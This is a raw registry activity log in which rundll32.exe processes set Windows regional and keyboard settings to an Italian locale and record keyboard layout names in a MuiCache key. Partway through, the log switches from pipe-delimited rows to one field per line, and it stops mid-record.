2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sThousand | .
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sMonThousandSep | .
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sList | ;
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iDigits | 2
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iLZero | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iNegNumber | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sNativeDigits | 0123456789
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | NumShape | 1
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iMeasure | 0
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iFirstDayOfWeek | 0
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iFirstWeekOfYear | 2
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sGrouping | 3;0
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sMonGrouping | 3;0
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sPositiveSign | (blank)
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sNegativeSign | -
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iPaperSize | 9
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sShortTime | HH:mm
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sLanguage | ITA
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sCountry | Italy
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCountry | 39
2720 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | en-US
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Keyboard Layout\Preload | 2 | 00000409
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Keyboard Layout\Preload | 1 | 00000410
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53} | Enable | 0
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Default | {00000000-0000-0000-0000-000000000000}
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Profile | {00000000-0000-0000-0000-000000000000}
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | KeyboardLayout | 68158480
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language | 00000000 | 00000410
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | CLSID | {00000000-0000-0000-0000-000000000000}
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | Profile | {00000000-0000-0000-0000-000000000000}
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | KeyboardLayout | 68158480
2720 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International\Geo | Nation | 118
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
636 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | en-US
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5084 | Arabic (101)
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5053 | Bulgarian (Typewriter)
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5065 | Chinese (Traditional) - US Keyboard
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5031 | Czech
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5007 | Danish
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5011 | German
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5046 | Greek
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5000 | US
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5020 | Spanish
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5009 | Finnish
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5010 | French
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5083 | Hebrew
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5033 | Hungarian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5013 | Icelandic
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5015 | Italian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5061 | Japanese
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5063 | Korean
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5008 | Dutch
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5018 | Norwegian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5035 | Polish (Programmers)
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5003 | Portuguese (Brazilian ABNT)
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5037 | Romanian (Legacy)
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5055 | Russian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5030 | Croatian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5039 | Slovak
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5029 | Albanian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5022 | Swedish
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5079 | Thai Kedmanee
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5060 | Turkish Q
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5129 | Urdu
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5058 | Ukrainian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5052 | Belarusian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5041 | Slovenian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5042 | Estonian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5043 | Latvian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5045 | Lithuanian IBM
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5151 | Tajik
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5124 | Persian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5118 | Vietnamese
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5120 | Armenian Eastern
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5117 | Azeri Latin
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5163 | Sorbian Standard (Legacy)
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5109 | Macedonian (FYROM)
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5191 | Setswana
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5119 | Georgian
636 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5108 | Faeroese
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5096
Devanagari - INSCRIPT
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5140
Maltese 47-Key
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5138
Norwegian with Sami
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5113
Kazakh
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5128
Kyrgyz Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5150
Turkmen
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5116
Tatar
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5135
Bengali
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5101
Punjabi
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5097
Gujarati
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5100
Oriya
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5102
Tamil
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5103
Telugu
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5098
Kannada
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5139
Malayalam
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5177
Assamese - INSCRIPT
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5104
Marathi
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5127
Mongolian Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5154
Tibetan (PRC)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5145
United Kingdom Extended
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5161
Khmer
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5162
Lao
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5130
Syriac
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5166
Sinhala
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5169
Nepali
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5159
Pashto (Afghanistan)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5132
Divehi Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5187
Hausa
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5189
Yoruba
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5186
Sesotho sa Leboa
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5148
Bashkir
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5168
Luxembourgish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5170
Greenlandic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5188
Igbo
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5165
Uyghur (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5146
Maori
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5160
Yakut
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5190
Wolof
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5072
Chinese (Simplified) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5024
Swiss German
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5025
United Kingdom
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5017
Latin American
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5002
Belgian French
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5001
Belgian (Period)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5019
Portuguese
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5038
Serbian (Latin)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5115
Azeri Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5144
Swedish with Sami
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5114
Uzbek Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5158
Mongolian (Mongolian Script)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5156
Inuktitut - Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5192
Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5005
Canadian French (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5057
Serbian (Cyrillic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5193
Chinese (Simplified, Singapore) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5004
Canadian French
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5023
Swiss French
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5194
Chinese (Traditional, Macao S.A.R.) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5014
Irish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5155
Bosnian (Cyrillic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5085
Arabic (102)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5054
Bulgarian (Latin)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5032
Czech (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5012
German (IBM)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5048
Greek (220)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5092
United States-Dvorak
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5021
Spanish Variation
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5034
Hungarian 101-key
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5016
Italian (142)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5036
Polish (214)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5126
Portuguese (Brazilian ABNT2)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5175
Romanian (Standard)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5056
Russian (Typewriter)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5040
Slovak (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5080
Thai Pattachote
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5059
Turkish F
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5044
Latvian (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5088
Lithuanian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5121
Armenian Western
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5164
Sorbian Extended
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5174
Macedonian (FYROM) - Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5182
Georgian (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5105
Hindi Traditional
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5141
Maltese 48-Key
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5143
Sami Extended Norway
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5136
Bengali - INSCRIPT (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5131
Syriac Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5167
Sinhala - Wij 9
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5171
Inuktitut - Naqittaut
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5133
Divehi Typewriter
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5185
Uyghur
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5089
Belgian (Comma)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5137
Finnish with Sami
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5110
Canadian Multilingual Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5125
Gaelic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5086
Arabic (102) AZERTY
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5173
Bulgarian (Phonetic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5087
Czech Programmers
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5049
Greek (319)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5026
United States-International
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5176
Romanian (Programmers)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5081
Thai Kedmanee (non-ShiftLock)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5179
Ukrainian (Enhanced)
636
rundll32.exe
write
